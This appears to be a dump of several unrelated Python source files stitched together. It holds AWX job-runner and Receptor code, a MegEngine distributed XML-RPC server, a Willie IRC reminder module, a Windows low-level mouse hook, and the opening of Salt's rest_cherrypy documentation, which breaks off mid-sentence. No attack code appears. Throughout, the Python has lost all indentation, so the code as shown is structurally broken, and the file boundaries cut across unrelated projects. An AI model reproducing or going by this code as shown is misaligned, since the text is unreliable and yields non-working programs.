base_env = super(RunSystemJob, self).build_env(instance, private_data_dir, private_data_files=private_data_files)
# TODO: this is able to run by turning off isolation
# the goal is to run it a container instead
env = dict(os.environ.items())
env.update(base_env)
return env
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def build_inventory(self, instance, private_data_dir):
return None
def _reconstruct_relationships(copy_mapping):
for old_obj, new_obj in copy_mapping.items():
model = type(old_obj)
for field_name in getattr(model, 'FIELDS_TO_PRESERVE_AT_COPY', []):
field = model._meta.get_field(field_name)
if isinstance(field, ForeignKey):
if getattr(new_obj, field_name, None):
continue
related_obj = getattr(old_obj, field_name)
related_obj = copy_mapping.get(related_obj, related_obj)
setattr(new_obj, field_name, related_obj)
elif field.many_to_many:
for related_obj in getattr(old_obj, field_name).all():
logger.debug('Deep copy: Adding {} to {}({}).{} relationship'.format(related_obj, new_obj, model, field_name))
getattr(new_obj, field_name).add(copy_mapping.get(related_obj, related_obj))
new_obj.save()
@task(queue=get_local_queuename)
def deep_copy_model_obj(model_module, model_name, obj_pk, new_obj_pk, user_pk, uuid, permission_check_func=None):
sub_obj_list = cache.get(uuid)
if sub_obj_list is None:
logger.error('Deep copy {} from {} to {} failed unexpectedly.'.format(model_name, obj_pk, new_obj_pk))
return
logger.debug('Deep copy {} from {} to {}.'.format(model_name, obj_pk, new_obj_pk))
from awx.api.generics import CopyAPIView
from awx.main.signals import disable_activity_stream
model = getattr(importlib.import_module(model_module), model_name, None)
if model is None:
return
try:
obj = model.objects.get(pk=obj_pk)
new_obj = model.objects.get(pk=new_obj_pk)
creater = User.objects.get(pk=user_pk)
except ObjectDoesNotExist:
logger.warning("Object or user no longer exists.")
return
with transaction.atomic(), ignore_inventory_computed_fields(), disable_activity_stream():
copy_mapping = {}
for sub_obj_setup in sub_obj_list:
sub_model = getattr(importlib.import_module(sub_obj_setup[0]), sub_obj_setup[1], None)
if sub_model is None:
continue
try:
sub_obj = sub_model.objects.get(pk=sub_obj_setup[2])
except ObjectDoesNotExist:
continue
copy_mapping.update(CopyAPIView.copy_model_obj(obj, new_obj, sub_model, sub_obj, creater))
_reconstruct_relationships(copy_mapping)
if permission_check_func:
permission_check_func = getattr(getattr(importlib.import_module(permission_check_func[0]), permission_check_func[1]), permission_check_func[2])
permission_check_func(creater, copy_mapping.values())
if isinstance(new_obj, Inventory):
update_inventory_computed_fields.delay(new_obj.id)
class TransmitterThread(threading.Thread):
def run(self):
self.exc = None
try:
super().run()
except Exception:
self.exc = sys.exc_info()
class AWXReceptorJob:
def __init__(self, task, runner_params=None):
self.task = task
self.runner_params = runner_params
self.unit_id = None
if self.task and not self.task.instance.is_container_group_task:
execution_environment_params = self.task.build_execution_environment_params(self.task.instance, runner_params['private_data_dir'])
self.runner_params.update(execution_environment_params)
def run(self):
# We establish a connection to the Receptor socket
receptor_ctl = get_receptor_ctl()
res = None
try:
res = self._run_internal(receptor_ctl)
return res
finally:
# Make sure to always release the work unit if we established it
if self.unit_id is not None and settings.RECEPTOR_RELEASE_WORK:
receptor_ctl.simple_command(f"work release {self.unit_id}")
# If an error occured without the job itself failing, it could be a broken instance
if self.work_type == 'ansible-runner' and ((res is None) or (getattr(res, 'rc', None) is None)):
execution_node_health_check(self.task.instance.execution_node)
def _run_internal(self, receptor_ctl):
# Create a socketpair. Where the left side will be used for writing our payload
# (private data dir, kwargs). The right side will be passed to Receptor for
# reading.
sockin, sockout = socket.socketpair()
transmitter_thread = TransmitterThread(target=self.transmit, args=[sockin])
transmitter_thread.start()
# submit our work, passing
# in the right side of our socketpair for reading.
_kw = {}
if self.work_type == 'ansible-runner':
_kw['node'] = self.task.instance.execution_node
use_stream_tls = get_conn_type(_kw['node'], receptor_ctl).name == "STREAMTLS"
_kw['tlsclient'] = get_tls_client(use_stream_tls)
result = receptor_ctl.submit_work(worktype=self.work_type, payload=sockout.makefile('rb'), params=self.receptor_params, **_kw)
self.unit_id = result['unitid']
self.task.update_model(self.task.instance.pk, work_unit_id=result['unitid'])
sockin.close()
sockout.close()
if transmitter_thread.exc:
raise transmitter_thread.exc[1].with_traceback(transmitter_thread.exc[2])
transmitter_thread.join()
resultsock, resultfile = receptor_ctl.get_work_results(self.unit_id, return_socket=True, return_sockfile=True)
# Both "processor" and "cancel_watcher" are spawned in separate threads.
# We wait for the first one to return. If cancel_watcher returns first,
# we yank the socket out from underneath the processor, which will cause it
# to exit. A reference to the processor_future is passed into the cancel_watcher_future,
# Which exits if the job has finished normally. The context manager ensures we do not
# leave any threads laying around.
with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
processor_future = executor.submit(self.processor, resultfile)
cancel_watcher_future = executor.submit(self.cancel_watcher, processor_future)
futures = [processor_future, cancel_watcher_future]
first_future = concurrent.futures.wait(futures, return_when=concurrent.futures.FIRST_COMPLETED)
res = list(first_future.done)[0].result()
if res.status == 'canceled':
receptor_ctl.simple_command(f"work cancel {self.unit_id}")
resultsock.shutdown(socket.SHUT_RDWR)
resultfile.close()
elif res.status == 'error':
unit_status = receptor_ctl.simple_command(f'work status {self.unit_id}')
detail = unit_status['Detail']
state_name = unit_status['StateName']
if 'exceeded quota' in detail:
logger.warn(detail)
log_name = self.task.instance.log_format
logger.warn(f"Could not launch pod for {log_name}. Exceeded quota.")
self.task.update_model(self.task.instance.pk, status='pending')
return
# If ansible-runner ran, but an error occured at runtime, the traceback information
# is saved via the status_handler passed in to the processor.
if state_name == 'Succeeded':
return res
if not self.task.instance.result_traceback:
try:
resultsock = receptor_ctl.get_work_results(self.unit_id, return_sockfile=True)
lines = resultsock.readlines()
self.task.instance.result_traceback = b"".join(lines).decode()
self.task.instance.save(update_fields=['result_traceback'])
except Exception:
raise RuntimeError(detail)
return res
# Spawned in a thread so Receptor can start reading before we finish writing, we
# write our payload to the left side of our socketpair.
@cleanup_new_process
def transmit(self, _socket):
if not settings.IS_K8S and self.work_type == 'local' and 'only_transmit_kwargs' not in self.runner_params:
self.runner_params['only_transmit_kwargs'] = True
try:
ansible_runner.interface.run(streamer='transmit', _output=_socket.makefile('wb'), **self.runner_params)
finally:
# Socket must be shutdown here, or the reader will hang forever.
_socket.shutdown(socket.SHUT_WR)
@cleanup_new_process
def processor(self, resultfile):
return ansible_runner.interface.run(
streamer='process',
quiet=True,
_input=resultfile,
event_handler=self.task.event_handler,
finished_callback=self.task.finished_callback,
status_handler=self.task.status_handler,
**self.runner_params,
)
@property
def receptor_params(self):
if self.task.instance.is_container_group_task:
spec_yaml = yaml.dump(self.pod_definition, explicit_start=True)
receptor_params = {
"secret_kube_pod": spec_yaml,
"pod_pending_timeout": getattr(settings, 'AWX_CONTAINER_GROUP_POD_PENDING_TIMEOUT', "5m"),
}
if self.credential:
kubeconfig_yaml = yaml.dump(self.kube_config, explicit_start=True)
receptor_params["secret_kube_config"] = kubeconfig_yaml
else:
private_data_dir = self.runner_params['private_data_dir']
if self.work_type == 'ansible-runner':
# on execution nodes, we rely on the private data dir being deleted
cli_params = f"--private-data-dir={private_data_dir} --delete"
else:
# on hybrid nodes, we rely on the private data dir NOT being deleted
cli_params = f"--private-data-dir={private_data_dir}"
receptor_params = {"params": cli_params}
return receptor_params
@property
def work_type(self):
if self.task.instance.is_container_group_task:
if self.credential:
return 'kubernetes-runtime-auth'
return 'kubernetes-incluster-auth'
if self.task.instance.execution_node == settings.CLUSTER_HOST_ID or self.task.instance.execution_node == self.task.instance.controller_node:
return 'local'
return 'ansible-runner'
@cleanup_new_process
def cancel_watcher(self, processor_future):
while True:
if processor_future.done():
return processor_future.result()
if self.task.cancel_callback():
result = namedtuple('result', ['status', 'rc'])
return result('canceled', 1)
time.sleep(1)
@property
def pod_definition(self):
ee = self.task.instance.execution_environment
default_pod_spec = get_default_pod_spec()
pod_spec_override = {}
if self.task and self.task.instance.instance_group.pod_spec_override:
pod_spec_override = parse_yaml_or_json(self.task.instance.instance_group.pod_spec_override)
pod_spec = {**default_pod_spec, **pod_spec_override}
pod_spec['spec']['containers'][0]['image'] = ee.image
pod_spec['spec']['containers'][0]['args'] = ['ansible-runner', 'worker', '--private-data-dir=/runner']
# Enforce EE Pull Policy
pull_options = {"always": "Always", "missing": "IfNotPresent", "never": "Never"}
if self.task and self.task.instance.execution_environment:
if self.task.instance.execution_environment.pull:
pod_spec['spec']['containers'][0]['imagePullPolicy'] = pull_options[self.task.instance.execution_environment.pull]
if self.task and self.task.instance.is_container_group_task:
# If EE credential is passed, create an imagePullSecret
if self.task.instance.execution_environment and self.task.instance.execution_environment.credential:
# Create pull secret in k8s cluster based on ee cred
from awx.main.scheduler.kubernetes import PodManager # prevent circular import
pm = PodManager(self.task.instance)
secret_name = pm.create_secret(job=self.task.instance)
# Inject secret name into podspec
pod_spec['spec']['imagePullSecrets'] = [{"name": secret_name}]
if self.task:
pod_spec['metadata'] = deepmerge(
pod_spec.get('metadata', {}),
dict(name=self.pod_name, labels={'ansible-awx': settings.INSTALL_UUID, 'ansible-awx-job-id': str(self.task.instance.id)}),
)
return pod_spec
@property
def pod_name(self):
return f"automation-job-{self.task.instance.id}"
@property
def credential(self):
return self.task.instance.instance_group.credential
@property
def namespace(self):
return self.pod_definition['metadata']['namespace']
@property
def kube_config(self):
host_input = self.credential.get_input('host')
config = {
"apiVersion": "v1",
"kind": "Config",
"preferences": {},
"clusters": [{"name": host_input, "cluster": {"server": host_input}}],
"users": [{"name": host_input, "user": {"token": self.credential.get_input('bearer_token')}}],
"contexts": [{"name": host_input, "context": {"cluster": host_input, "user": host_input, "namespace": self.namespace}}],
"current-context": host_input,
}
if self.credential.get_input('verify_ssl') and 'ssl_ca_cert' in self.credential.inputs:
config["clusters"][0]["cluster"]["certificate-authority-data"] = b64encode(
self.credential.get_input('ssl_ca_cert').encode() # encode to bytes
).decode() # decode the base64 data into a str
else:
config["clusters"][0]["cluster"]["insecure-skip-tls-verify"] = True
return config
|
server.py | # -*- coding: utf-8 -*-
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import multiprocessing as mp
import threading
import time
from collections import defaultdict
from functools import partial
from socketserver import ThreadingMixIn
from xmlrpc.client import ServerProxy
from xmlrpc.server import SimpleXMLRPCServer
from ..core._imperative_rt.utils import create_mm_server
from ..utils.future import Future
class Methods:
r"""Distributed Server Method.
Used for exchange information between distributed nodes.
Args:
mm_server_port: multiple machine rpc server port.
"""
def __init__(self, mm_server_port):
self.lock = threading.Lock()
self.mm_server_port = mm_server_port
self.dict_is_grad = defaultdict(partial(Future, True))
self.dict_remote_tracer = defaultdict(partial(Future, True))
self.dict_pack_list = defaultdict(partial(Future, False))
self.dict_barrier_counter = defaultdict(int)
self.dict_barrier_event = defaultdict(threading.Event)
self.user_dict = defaultdict(partial(Future, False))
self.bcast_dict = {}
def connect(self):
r"""Method for checking connection success."""
return True
def get_mm_server_port(self):
r"""Get multiple machine rpc server port."""
return self.mm_server_port
def set_is_grad(self, key, is_grad):
r"""Mark send/recv need gradiants by key.
Args:
key: key to match send/recv op.
is_grad: whether this op need grad.
"""
with self.lock:
future = self.dict_is_grad[key]
future.set(is_grad)
return True
def check_is_grad(self, key):
r"""Check whether send/recv need gradiants.
Args:
key: key to match send/recv op.
"""
with self.lock:
future = self.dict_is_grad[key]
ret = future.get()
with self.lock:
del self.dict_is_grad[key]
return ret
def set_remote_tracer(self, key, tracer_set):
r"""Set tracer dict for tracing send/recv op.
Args:
key: key to match send/recv op.
tracer_set: valid tracer set.
"""
with self.lock:
future = self.dict_remote_tracer[key]
future.set(tracer_set)
return True
def check_remote_tracer(self, key):
r"""Get tracer dict for send/recv op.
Args:
key: key to match send/recv op.
"""
with self.lock:
future = self.dict_remote_tracer[key]
ret = future.get()
with self.lock:
del self.dict_remote_tracer[key]
return ret
def group_barrier(self, key, size):
r"""A barrier wait for all group member.
Args:
key: group key to match each other.
size: group size.
"""
with self.lock:
self.dict_barrier_counter[key] += 1
counter = self.dict_barrier_counter[key]
event = self.dict_barrier_event[key]
if counter == size:
del self.dict_barrier_counter[key]
del self.dict_barrier_event[key]
event.set()
else:
event.wait()
return True
def user_set(self, key, val):
r"""Set user defined key-value pairs across processes."""
with self.lock:
future = self.user_dict[key]
future.set(val)
return True
def user_get(self, key):
r"""Get user defined key-value pairs across processes."""
with self.lock:
future = self.user_dict[key]
return future.get()
def bcast_val(self, val, key, size):
with self.lock:
if key not in self.bcast_dict:
self.bcast_dict[key] = [Future(False), size]
arr = self.bcast_dict[key]
if val is not None:
arr[0].set(val)
val = None
else:
val = arr[0].get()
with self.lock:
cnt = arr[1] - 1
arr[1] = cnt
if cnt == 0:
del self.bcast_dict[key]
return val
def _del(self, key):
with self.lock:
del self.user_dict[key]
# thread safe function
def user_pop(self, key):
ret = self.user_get(key)
self._del(key)
return ret
class ThreadXMLRPCServer(ThreadingMixIn, SimpleXMLRPCServer):
pass
def _start_server(py_server_port, queue):
r"""Start python distributed server and multiple machine server.
Args:
py_server_port: python server port.
mm_server_port: multiple machine server port.
queue: server port will put in this queue, puts exception when process fails.
"""
try:
mm_server_port = create_mm_server("0.0.0.0", 0)
server = ThreadXMLRPCServer(
("0.0.0.0", py_server_port), logRequests=False, allow_none=True
)
server.register_instance(Methods(mm_server_port))
_, py_server_port = server.server_address
queue.put((py_server_port, mm_server_port))
server.serve_forever()
except Exception as e:
queue.put(e)
class Server:
r"""Distributed Server for distributed training.
Should be running at master node.
Args:
port: python server port.
"""
def __init__(self, port=0):
q = mp.Queue()
self.proc = mp.Process(target=_start_server, args=(port, q), daemon=True)
self.proc.start()
ret = q.get()
if isinstance(ret, Exception):
raise ret
else:
self.py_server_port, self.mm_server_port = ret
def __del__(self):
self.proc.terminate()
class Client:
r"""Distributed Client for distributed training.
Args:
master_ip: ip address of master node.
port: port of server at master node.
"""
def __init__(self, master_ip, port):
self.master_ip = master_ip
self.port = port
self.connect()
self.bcast_dict = defaultdict(lambda: 0)
def connect(self):
r"""Check connection success."""
while True:
try:
self.proxy = ServerProxy(
"http://{}:{}".format(self.master_ip, self.port), allow_none=True
)
if self.proxy.connect():
break
except:
time.sleep(1)
def get_mm_server_port(self):
r"""Get multiple machine server port."""
return self.proxy.get_mm_server_port()
def set_is_grad(self, key, is_grad):
r"""Mark send/recv need gradiants by key.
Args:
key: key to match send/recv op.
is_grad: whether this op need grad.
"""
self.proxy.set_is_grad(key, is_grad)
def check_is_grad(self, key):
r"""Check whether send/recv need gradiants.
Args:
key: key to match send/recv op.
"""
return self.proxy.check_is_grad(key)
def set_remote_tracer(self, key, tracer_set):
r"""Set tracer dict for tracing send/recv op.
Args:
key: key to match send/recv op.
tracer_set: valid tracer set.
"""
self.proxy.set_remote_tracer(key, tracer_set)
def check_remote_tracer(self, key):
r"""Get tracer dict for send/recv op.
Args:
key: key to match send/recv op.
"""
return self.proxy.check_remote_tracer(key)
def group_barrier(self, key, size):
r"""A barrier wait for all group member.
Args:
key: group key to match each other.
size: group size.
"""
self.proxy.group_barrier(key, size)
def user_set(self, key, val):
r"""Set user defined key-value pairs across processes."""
return self.proxy.user_set(key, val)
def user_get(self, key):
r"""Get user defined key-value pairs across processes."""
return self.proxy.user_get(key)
def user_pop(self, key):
r"""Get user defined key-value pairs and delete the resources when the get is done"""
return self.proxy.user_pop(key)
def bcast_val(self, val, key, size):
idx = self.bcast_dict[key] + 1
self.bcast_dict[key] = idx
key = key + "_bcast_" + str(idx)
return self.proxy.bcast_val(val, key, size)
def main(port=0, verbose=True):
mm_server_port = create_mm_server("0.0.0.0", 0)
server = ThreadXMLRPCServer(("0.0.0.0", port), logRequests=verbose)
server.register_instance(Methods(mm_server_port))
_, port = server.server_address
print("serving on port", port)
server.serve_forever()
if __name__ == "__main__":
import argparse
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--port", type=int, default=0)
ap.add_argument("-v", "--verbose", type=bool, default=True)
args = ap.parse_args()
main(port=args.port, verbose=args.verbose)
|
remind.py | """
remind.py - Willie Reminder Module
Copyright 2011, Sean B. Palmer, inamidst.com
Licensed under the Eiffel Forum License 2.
http://willie.dftba.net
"""
import os
import re
import time
import threading
import collections
import codecs
from datetime import datetime
from willie.module import commands, example, NOLIMIT
import willie.tools
try:
import pytz
except:
pytz = None
def filename(self):
name = self.nick + '-' + self.config.host + '.reminders.db'
return os.path.join(self.config.dotdir, name)
def load_database(name):
data = {}
if os.path.isfile(name):
f = codecs.open(name, 'r', encoding='utf-8')
for line in f:
unixtime, channel, nick, message = line.split('\t')
message = message.rstrip('\n')
t = int(float(unixtime)) # WTFs going on here?
reminder = (channel, nick, message)
try:
data[t].append(reminder)
except KeyError:
data[t] = [reminder]
f.close()
return data
def dump_database(name, data):
f = codecs.open(name, 'w', encoding='utf-8')
for unixtime, reminders in willie.tools.iteritems(data):
for channel, nick, message in reminders:
f.write('%s\t%s\t%s\t%s\n' % (unixtime, channel, nick, message))
f.close()
def setup(bot):
bot.rfn = filename(bot)
bot.rdb = load_database(bot.rfn)
def monitor(bot):
time.sleep(5)
while True:
now = int(time.time())
unixtimes = [int(key) for key in bot.rdb]
oldtimes = [t for t in unixtimes if t <= now]
if oldtimes:
for oldtime in oldtimes:
for (channel, nick, message) in bot.rdb[oldtime]:
if message:
bot.msg(channel, nick + ': ' + message)
else:
bot.msg(channel, nick + '!')
del bot.rdb[oldtime]
dump_database(bot.rfn, bot.rdb)
time.sleep(2.5)
targs = (bot,)
t = threading.Thread(target=monitor, args=targs)
t.start()
scaling = collections.OrderedDict([
('years', 365.25 * 24 * 3600),
('year', 365.25 * 24 * 3600),
('yrs', 365.25 * 24 * 3600),
('y', 365.25 * 24 * 3600),
('months', 29.53059 * 24 * 3600),
('month', 29.53059 * 24 * 3600),
('mo', 29.53059 * 24 * 3600),
('weeks', 7 * 24 * 3600),
('week', 7 * 24 * 3600),
('wks', 7 * 24 * 3600),
('wk', 7 * 24 * 3600),
('w', 7 * 24 * 3600),
('days', 24 * 3600),
('day', 24 * 3600),
('d', 24 * 3600),
('hours', 3600),
('hour', 3600),
('hrs', 3600),
('hr', 3600),
('h', 3600),
('minutes', 60),
('minute', 60),
('mins', 60),
('min', 60),
('m', 60),
('seconds', 1),
('second', 1),
('secs', 1),
('sec', 1),
('s', 1),
])
periods = '|'.join(scaling.keys())
@commands('in')
@example('.in 3h45m Go to class')
def remind(bot, trigger):
"""Gives you a reminder in the given amount of time."""
duration = 0
message = re.split('(\d+(?:\.\d+)? ?(?:' + periods + ')) ?', trigger.group(2))[1:]
reminder = ''
stop = False
for piece in message:
grp = re.match('(\d+(?:\.\d+)?) ?(.*) ?', piece)
if grp and not stop:
length = float(grp.group(1))
factor = scaling.get(grp.group(2), 60)
duration += length * factor
else:
reminder = reminder + piece
stop = True
if duration == 0:
return bot.reply("Sorry, didn't understand the input.")
if duration % 1:
duration = int(duration) + 1
else:
duration = int(duration)
timezone = willie.tools.get_timezone(
bot.db, bot.config, None, trigger.nick, trigger.sender)
create_reminder(bot, trigger, duration, reminder, timezone)
@commands('at')
@example('.at 13:47 Do your homework!')
def at(bot, trigger):
"""
Gives you a reminder at the given time. Takes hh:mm:ssTimezone
message. Timezone is any timezone Willie takes elsewhere; the best choices
are those from the tzdb; a list of valid options is available at
http://dft.ba/-tz . The seconds and timezone are optional.
"""
regex = re.compile(r'(\d+):(\d+)(?::(\d+))?([^\s\d]+)? (.*)')
match = regex.match(trigger.group(2))
if not match:
bot.reply("Sorry, but I didn't understand your input.")
return NOLIMIT
hour, minute, second, tz, message = match.groups()
if not second:
second = '0'
if pytz:
timezone = willie.tools.get_timezone(bot.db, bot.config, tz,
trigger.nick, trigger.sender)
now = datetime.now(pytz.timezone(timezone))
at_time = datetime(now.year, now.month, now.day,
int(hour), int(minute), int(second),
tzinfo=now.tzinfo)
timediff = at_time - now
else:
if tz and tz.upper() != 'UTC':
bot.reply("I don't have timzeone support installed.")
return NOLIMIT
now = datetime.now()
at_time = datetime(now.year, now.month, now.day,
int(hour), int(minute), int(second))
timediff = at_time - now
duration = timediff.seconds
if duration < 0:
duration += 86400
create_reminder(bot, trigger, duration, message, 'UTC')
def create_reminder(bot, trigger, duration, message, tz):
t = int(time.time()) + duration
reminder = (trigger.sender, trigger.nick, message)
try:
bot.rdb[t].append(reminder)
except KeyError:
bot.rdb[t] = [reminder]
dump_database(bot.rfn, bot.rdb)
if duration >= 60:
remind_at = datetime.utcfromtimestamp(t)
timef = willie.tools.format_time(bot.db, bot.config, tz, trigger.nick,
trigger.sender, remind_at)
bot.reply('Okay, will remind at %s' % timef)
else:
bot.reply('Okay, will remind in %s secs' % duration)
|
hooks.py |
# Based on:
# https://stackoverflow.com/a/31396340
from ctypes import *
from ctypes.wintypes import *
user32 = WinDLL('user32', use_last_error=True)
HC_ACTION = 0
WH_MOUSE_LL = 14
WM_QUIT = 0x0012
WM_MOUSEMOVE = 0x0200
WM_LBUTTONDOWN = 0x0201
WM_LBUTTONUP = 0x0202
WM_RBUTTONDOWN = 0x0204
WM_RBUTTONUP = 0x0205
WM_MBUTTONDOWN = 0x0207
WM_MBUTTONUP = 0x0208
WM_MOUSEWHEEL = 0x020A
WM_MOUSEHWHEEL = 0x020E
MSG_TEXT = {WM_MOUSEMOVE: 'WM_MOUSEMOVE',
WM_LBUTTONDOWN: 'WM_LBUTTONDOWN',
WM_LBUTTONUP: 'WM_LBUTTONUP',
WM_RBUTTONDOWN: 'WM_RBUTTONDOWN',
WM_RBUTTONUP: 'WM_RBUTTONUP',
WM_MBUTTONDOWN: 'WM_MBUTTONDOWN',
WM_MBUTTONUP: 'WM_MBUTTONUP',
WM_MOUSEWHEEL: 'WM_MOUSEWHEEL',
WM_MOUSEHWHEEL: 'WM_MOUSEHWHEEL'}
ULONG_PTR = WPARAM
LRESULT = LPARAM
LPMSG = POINTER(MSG)
HOOKPROC = WINFUNCTYPE(LRESULT, c_int, WPARAM, LPARAM)
LowLevelMouseProc = HOOKPROC
class MSLLHOOKSTRUCT(Structure):
_fields_ = (('pt', POINT),
('mouseData', DWORD),
('flags', DWORD),
('time', DWORD),
('dwExtraInfo', ULONG_PTR))
LPMSLLHOOKSTRUCT = POINTER(MSLLHOOKSTRUCT)
def errcheck_bool(result, func, args):
if not result:
raise WinError(get_last_error())
return args
user32.SetWindowsHookExW.errcheck = errcheck_bool
user32.SetWindowsHookExW.restype = HHOOK
user32.SetWindowsHookExW.argtypes = (c_int, # _In_ idHook
HOOKPROC, # _In_ lpfn
HINSTANCE, # _In_ hMod
DWORD) # _In_ dwThreadId
user32.CallNextHookEx.restype = LRESULT
user32.CallNextHookEx.argtypes = (HHOOK, # _In_opt_ hhk
c_int, # _In_ nCode
WPARAM, # _In_ wParam
LPARAM) # _In_ lParam
user32.GetMessageW.argtypes = (LPMSG, # _Out_ lpMsg
HWND, # _In_opt_ hWnd
UINT, # _In_ wMsgFilterMin
UINT) # _In_ wMsgFilterMax
user32.TranslateMessage.argtypes = (LPMSG,)
user32.DispatchMessageW.argtypes = (LPMSG,)
from PySide2.QtCore import Signal, QObject
class _MouseSignaler(QObject):
left_up = Signal()
left_down = Signal()
def __init__(self):
super().__init__()
self.left_down.connect(self._left_down_slot)
self.left_up.connect(self._left_up_slot)
self._left_is_down = False
def _left_up_slot(self):
self._left_is_down = False
def _left_down_slot(self):
self._left_is_down = True
@property
def left_is_down(self):
return self._left_is_down
MouseSignaler = _MouseSignaler()
@LowLevelMouseProc
def LLMouseProc(nCode, wParam, lParam):
msg = cast(lParam, LPMSLLHOOKSTRUCT)[0]
if nCode == HC_ACTION:
# msgid = MSG_TEXT.get(wParam, str(wParam))
if wParam == WM_LBUTTONUP:
MouseSignaler.left_up.emit()
elif wParam == WM_LBUTTONDOWN:
MouseSignaler.left_down.emit()
# msg = ((msg.pt.x, msg.pt.y),
# msg.mouseData, msg.flags,
# msg.time, msg.dwExtraInfo)
# print('{:15s}: {}'.format(msgid, msg))
return user32.CallNextHookEx(None, nCode, wParam, lParam)
hHook = user32.SetWindowsHookExW(WH_MOUSE_LL, LLMouseProc, None, 0)
# def mouse_msg_loop():
# hHook = user32.SetWindowsHookExW(WH_MOUSE_LL, LLMouseProc, None, 0)
# msg = MSG()
# while True:
# bRet = user32.GetMessageW(byref(msg), None, 0, 0)
# if not bRet:
# break
# if bRet == -1:
# raise WinError(get_last_error())
# user32.TranslateMessage(byref(msg))
# user32.DispatchMessageW(byref(msg))
# if __name__ == '__main__':
# import time
# import threading
# t = threading.Thread(target=mouse_msg_loop)
# t.start()
# while True:
# try:
# time.sleep(1)
# except KeyboardInterrupt:
# user32.PostThreadMessageW(t.ident, WM_QUIT, 0, 0)
# break
|
app.py | """
A REST API for Salt
===================
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
.. note::
This module is Experimental on Windows platforms and supports limited
configurations:
- doesn't support PAM authentication (i.e. external_auth: auto)
- doesn't support SSL (i.e. disable_ssl: True)
:depends:
- CherryPy Python module.
Note: there is a `known SSL traceback for CherryPy versions 3.2.5 through
3.7.x <https://github.com/cherrypy/cherrypy/issues/1298>`_. Please use
version 3.2.3 or the latest 10.x version instead.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log_access_file
Path to a file to write HTTP access logs.
.. versionadded:: 2016.11.0
log_error_file
Path to a file to write HTTP error logs.
.. versionadded:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
.. deprecated:: 2016.11.9,2017.7.3,2018.3.0
The "expire_responses" configuration setting, which corresponds
to the ``timeout_monitor`` setting in CherryPy, is no longer
supported in CherryPy versions >= 12.0.0.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
stats_disable_auth : False
Do not require authentication to access the ``/stats`` endpoint.
.. versionadded:: 2018.3.0
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
enable_sessions : ``True``
Enable or disable all endpoints that rely on session cookies. This can
be useful to enforce only header-based authentication.
.. versionadded:: 2017.7.0
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
Warning! If you set this option to a custom web application, anything
that uses cookie-based authentication is vulnerable to XSRF attacks.
Send the custom ``X-Auth-Token`` header instead and consider disabling
the ``enable_sessions`` setting.
.. versionchanged:: 2017.7.0
Add a proof-of-concept JavaScript single-page app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=pam
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
